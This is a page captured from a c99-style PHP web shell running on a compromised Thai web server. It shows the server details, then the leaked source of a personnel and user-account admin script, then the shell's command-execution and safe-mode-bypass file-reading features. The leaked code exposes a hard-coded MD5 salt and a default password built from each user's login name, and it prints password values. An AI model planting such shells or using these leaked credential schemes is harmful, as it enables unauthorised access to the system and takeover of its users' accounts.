Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/eperson/admin/ drwxr-xr-x |
Viewing file: Select action/file-type: <?php include_once("../../class/clsConnection.php"); include_once("../../class/clsDB.php"); include_once "../global.php"; include_once "../link/function.php"; include_once "../class/clsTable.php"; include_once "../class/clsDepartment.php"; include_once "../class/clsPerson.php"; include_once "../class/clsUmuser.php"; include_once "../class/clsadmin.php"; include_once "../class/clshire.php"; include_once "../class/clsUmUserGroup.php"; $oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EPERSON'], $GLOBALS['DBUSER_EPERSON'], $GLOBALS['DBPASS_EPERSON']); $oUs = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_UMS'], $GLOBALS['DBUSER_UMS'], $GLOBALS['DBPASS_UMS']); $oDP = new Department($oC); $oDP2 = new Department($oC); $oDP3 = new Department($oC); $oPS = new Person($oC); $oUms= new umuser($oUs); $oUms2= new umuser($oUs); $oAd = new admin($oC); $oHr = new hire($oC); $oUg=new umusergroup($oUs); if($method=="editinfo"){ $oPS->SearchByKey($ps); if($oPS->GetRecord()=="1"){ $oPS->Edit(); $oPS->personId=$ps; echo "personId".$oPS->personId."<br>"; $oPS->prefixId=$prefixId; echo "prefixId".$oPS->prefixId."<br>"; $oPS->fName=$fName; echo "fName".$oPS->fName."<br>"; $oPS->lName=$lName; echo "lName".$oPS->lName."<br>"; $oPS->receiveDate=$oPS->receiveDate; echo "receiveDate".$oPS->receiveDate."<br>"; $oPS->pId=$oPS->pId; echo "pId".$oPS->pId."<br>"; $oPS->adlineId=$oPS->adlineId; echo "adlineId".$oPS->adlineId."<br>"; $oPS->adminposId=$oPS->adminposId; echo "adminposId".$oPS->adminposId."<br>"; $oPS->hireId=$hireId; echo "hireId".$oPS->hireId."<br>"; $oPS->majortypeId=$oPS->majortypeId; echo "majortypeId".$oPS->majortypeId."<br>"; $oPS->levelposId=$oPS->levelposId; echo "levelposId".$oPS->levelposId."<br>"; $oPS->stepSal=$oPS->stepSal; echo "stepSal".$oPS->stepSal."<br>"; $oPS->salary=$oPS->salary; echo "salary".$oPS->salary."<br>"; $oPS->partyId=$oPS->partyId; echo "partyId".$oPS->partyId."<br>"; $oPS->deptId=$deptId; echo "deptId".$oPS->deptId."<br>"; $oPS->majorId=$oPS->majorId; echo "majorId".$oPS->majorId."<br>"; $oPS->assignId=$oPS->assignId; echo "assignId".$oPS->assignId."<br>"; $oPS->promoteDate=$oPS->promoteDate; echo "promoteDate".$oPS->promoteDate."<br>"; $oPS->educDate=$oPS->educDate; echo "educDate".$oPS->educDate."<br>"; $oPS->posDate=$oPS->posDate; echo "posDate".$oPS->posDate."<br>"; $oPS->fullsalDate=$oPS->fullsalDate; echo "fullsalDate".$oPS->fullsalDate."<br>"; $oPS->typemoveId=$oPS->typemoveId; echo "typemoveId".$oPS->typemoveId."<br>"; $oPS->fyDecor=$oPS->fyDecor; echo "fyDecor".$oPS->fyDecor."<br>"; $oPS->lastDecor=$oPS->lastDecor; echo "lastDecor".$oPS->lastDecor."<br>"; $oPS->fRetire=$oPS->fRetire; echo "fRetire".$oPS->fRetire."<br>"; $oPS->adminId=$adminId; echo "adminId".$oPS->adminId."<br>"; $oPS->done=$oPS->done; echo "done".$oPS->done."<br>"; $oPS->accountNo=$oPS->accountNo; echo "accountNo".$oPS->accountNo."<br>"; $oPS->useSalary=$oPS->useSalary; echo "useSalary".$oPS->useSalary."<br>"; $oPS->personCode=$oPS->personCode; echo "personCode".$oPS->personCode."<br>"; $oPS->oldpersonCode=$oPS->oldpersonCode; echo "oldpersonCode".$oPS->oldpersonCode."<br>"; $oPS->admidYear=$oPS->admidYear; echo "admidYear".$oPS->admidYear."<br>"; $oPS->partyAtId=$oPS->partyAtId; echo "partyAtId".$oPS->partyAtId."<br>"; $oPS->partypracticeId=$oPS->partypracticeId; echo "partypracticeId".$oPS->partypracticeId."<br>"; $oPS->firstadmidDate=$oPS->firstadmidDate; echo "firstadmidDate".$oPS->firstadmidDate."<br>"; $oPS->posDegree=$oPS->posDegree; echo "posDegree".$oPS->posDegree."<br>"; $oPS->posEducmajor=$oPS->posEducmajor; echo "posEducmajor".$oPS->posEducmajor."<br>"; $oPS->enterType=$oPS->enterType; echo "enterType".$oPS->enterType."<br>"; $oPS->fStatus=$fStatus; echo "fStatus".$oPS->fStatus."<br>"; $oPS->salary2=$oPS->salary2; echo "salary2".$oPS->salary2."<br>"; $oPS->fullStep=$oPS->fullStep; echo "fullStep".$oPS->fullStep."<br>"; $oPS->levelposId2=$oPS->levelposId2; echo "levelposId2".$oPS->levelposId2."<br>"; $oPS->stepSal2=$oPS->stepSal2; echo "stepSal2".$oPS->stepSal2."<br>"; $oPS->useSalary2=$oPS->useSalary2; echo "useSalary2".$oPS->useSalary2."<br>"; $oPS->Save(); //---------------------------add data to ums echo "+++++umuser<br>"; $oUms->SearchByUsPsCode($ps); $oUms->GetRecord(); $oUms->Edit(); $oUms->UsID=$oUms->UsID; echo "UsID".$oUms->UsID."<br>"; $oUms->UsName=$fName." ".$lName; echo "UsName".$oUms->UsName."<br>"; $oUms->UsLogin=$oUms->UsLogin; echo "UsLogin".$oUms->UsLogin."<br>"; if ($UsPassword=="PaSsWoRd"){ echo '1---'.$oldMd5UsPassword; $oUms->UsPassword=$oldMd5UsPassword; }else{ $oUms->UsPassword=md5("O]O".$UsPassword."O[O");echo $UsPassword.'1----'.md5("O]O".$UsPassword."O[O").'+++++'; echo '2----'.md5("O]OÂO[O"); } $oUms->UsPsCode=$oUms->UsPsCode; echo "UsPsCode".$oUms->UsPsCode."<br>"; //echo "personId".$oPe->personId."<br>"; $oUms->UsWgID=$oUms->UsWgID; $oUms->UsQsID=$oUms->UsQsID; $oUms->UsAnswer=$oUms->UsAnswer; $oUms->UsEmail=$oUms->UsEmail; $oUms->UsActive=$oUms->UsActive; $oUms->UsAdmin=$oUms->UsAdmin; $oUms->UsDesc=$oUms->UsDesc; $oUms->UsPwdExpDt=$oUms->UsPwdExpDt; $oUms->UsUpdDt=$oUms->UsUpdDt; $oUms->UsUpdUsID=$oUms->UsUpdUsID; $oUms->UsSessionID=$oUms->UsSessionID; $oUms->Save(); } ?> <script language="JavaScript"> parent.location.href ="editPsInfo.php?s=1&ps=<? echo $ps; ?>&showrep=<? echo $showrep; ?>"; </script> <? }else if($method=="addinfo"){ $oPS->SearchfNamelName($fName,$lName); if($oPS->GetRecord()!=1){ $oUms2->SearchByUsLogin($loginName); if($oUms2->GetRecord()!=1){ $oPS->AddNew(); $numid=$oPS->GetNextCode(); if($numid==1){ $oPS->personId=$numid+1; }else{ $oPS->personId=$numid; } echo "personId".$oPS->personId."<br>"; $oPS->prefixId=$prefixId; echo "prefixId".$oPS->prefixId."<br>"; $oPS->fName=$fName; echo "fName".$oPS->fName."<br>"; $oPS->lName=$lName; echo "lName".$oPS->lName."<br>"; $oPS->receiveDate=$oPS->receiveDate; echo "receiveDate".$oPS->receiveDate."<br>"; $oPS->pId=$oPS->pId; echo "pId".$oPS->pId."<br>"; $oPS->adlineId=$oPS->adlineId; echo "adlineId".$oPS->adlineId."<br>"; $oPS->adminposId=$oPS->adminposId; echo "adminposId".$oPS->adminposId."<br>"; $oPS->hireId=$hireId; echo "hireId".$oPS->hireId."<br>"; $oPS->majortypeId=$oPS->majortypeId; echo "majortypeId".$oPS->majortypeId."<br>"; $oPS->levelposId=$oPS->levelposId; echo "levelposId".$oPS->levelposId."<br>"; $oPS->stepSal=$oPS->stepSal; echo "stepSal".$oPS->stepSal."<br>"; $oPS->salary=$oPS->salary; echo "salary".$oPS->salary."<br>"; $oPS->partyId=$oPS->partyId; echo "partyId".$oPS->partyId."<br>"; $oPS->deptId=$deptId; echo "deptId".$oPS->deptId."<br>"; $oPS->majorId=$oPS->majorId; echo "majorId".$oPS->majorId."<br>"; $oPS->assignId=$oPS->assignId; echo "assignId".$oPS->assignId."<br>"; $oPS->promoteDate=$oPS->promoteDate; echo "promoteDate".$oPS->promoteDate."<br>"; $oPS->educDate=$oPS->educDate; echo "educDate".$oPS->educDate."<br>"; $oPS->posDate=$oPS->posDate; echo "posDate".$oPS->posDate."<br>"; $oPS->fullsalDate=$oPS->fullsalDate; echo "fullsalDate".$oPS->fullsalDate."<br>"; $oPS->typemoveId=$oPS->typemoveId; echo "typemoveId".$oPS->typemoveId."<br>"; $oPS->fyDecor=$oPS->fyDecor; echo "fyDecor".$oPS->fyDecor."<br>"; $oPS->lastDecor=$oPS->lastDecor; echo "lastDecor".$oPS->lastDecor."<br>"; $oPS->fRetire="0"; echo "fRetire".$oPS->fRetire."<br>"; $oPS->adminId=$adminId; echo "adminId".$oPS->adminId."<br>"; $oPS->done=$oPS->done; echo "done".$oPS->done."<br>"; $oPS->accountNo=$oPS->accountNo; echo "accountNo".$oPS->accountNo."<br>"; $oPS->useSalary=$oPS->useSalary; echo "useSalary".$oPS->useSalary."<br>"; $oPS->personCode=$oPS->personCode; echo "personCode".$oPS->personCode."<br>"; $oPS->oldpersonCode=$oPS->oldpersonCode; echo "oldpersonCode".$oPS->oldpersonCode."<br>"; $oPS->admidYear=$oPS->admidYear; echo "admidYear".$oPS->admidYear."<br>"; $oPS->partyAtId=$oPS->partyAtId; echo "partyAtId".$oPS->partyAtId."<br>"; $oPS->partypracticeId=$oPS->partypracticeId; echo "partypracticeId".$oPS->partypracticeId."<br>"; $oPS->firstadmidDate=$oPS->firstadmidDate; echo "firstadmidDate".$oPS->firstadmidDate."<br>"; $oPS->posDegree=$oPS->posDegree; echo "posDegree".$oPS->posDegree."<br>"; $oPS->posEducmajor=$oPS->posEducmajor; echo "posEducmajor".$oPS->posEducmajor."<br>"; $oPS->enterType=$oPS->enterType; echo "enterType".$oPS->enterType."<br>"; $oPS->fStatus="1"; echo "fStatus".$oPS->fStatus."<br>"; $oPS->salary2=$oPS->salary2; echo "salary2".$oPS->salary2."<br>"; $oPS->fullStep=$oPS->fullStep; echo "fullStep".$oPS->fullStep."<br>"; $oPS->levelposId2=$oPS->levelposId2; echo "levelposId2".$oPS->levelposId2."<br>"; $oPS->stepSal2=$oPS->stepSal2; echo "stepSal2".$oPS->stepSal2."<br>"; $oPS->useSalary2=$oPS->useSalary2; echo "useSalary2".$oPS->useSalary2."<br>"; $oPS->Save(); $oUms->AddNew(); $oUms->UsID=$oUms->GetNextCode(); echo "UsID".$oUms->UsID."<br>"; $oUms->UsName=$fName." ".$lName; echo "UsName".$oUms->UsName."<br>"; $oUms->UsLogin=$loginName; echo "UsLogin".$oUms->UsLogin."<br>"; $oUms->UsPassword=md5("O]O57".strtolower(rtrim($loginName))."7O[O"); $oUms->UsPsCode=$oPS->personId; echo "UsPsCode".$oUms->UsPsCode."<br>"; //echo "personId".$oPe->personId."<br>"; $oUms->UsWgID=$oUms->UsWgID; $oUms->UsQsID=$oUms->UsQsID; $oUms->UsAnswer=$oUms->UsAnswer; $oUms->UsEmail=$oUms->UsEmail; $oUms->UsActive=$oUms->UsActive; $oUms->UsAdmin=$oUms->UsAdmin; $oUms->UsDesc=$oUms->UsDesc; $oUms->UsPwdExpDt=$oUms->UsPwdExpDt; $oUms->UsUpdDt=$oUms->UsUpdDt; $oUms->UsUpdUsID=$oUms->UsUpdUsID; $oUms->UsSessionID=$oUms->UsSessionID; $oUms->Save(); //---------------------------add data to ums echo "+++++umusergroup <br>"; $oUg->AddNew(); $oUg->UgID=$oUg->GetNextCode(); echo "UsID".$oUg->UgID."<br>"; $oUg->UgGpID="108"; //¼Ùéã¢é·ÑèÇ仢ͧÊÒúÃó echo "UgGpID".$oUg->UgGpID."<br>"; $oUg->UgUsID=$oUms->UsID; echo "UgUsID".$oUg->UgUsID."<br>"; $oUg->Save(); echo "--------------------------------<br>"; ?> <script language="JavaScript"> parent.location.href ="addPsInfo.php?s=1"; </script> <? }else{ ?> <script language="JavaScript"> parent.location.href ="addPsInfo.php?e=2"; </script> <? } }else{ ?> <script language="JavaScript"> parent.location.href ="addPsInfo.php?e=1"; </script> <? } }else if($method=="delps"){ include_once "checkDocPerson.php"; ?> <script language="JavaScript"> parent.location.href ="updatePerson.php?name=<? echo $name; ?>"; </script> <? } ?> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0057 ]-- |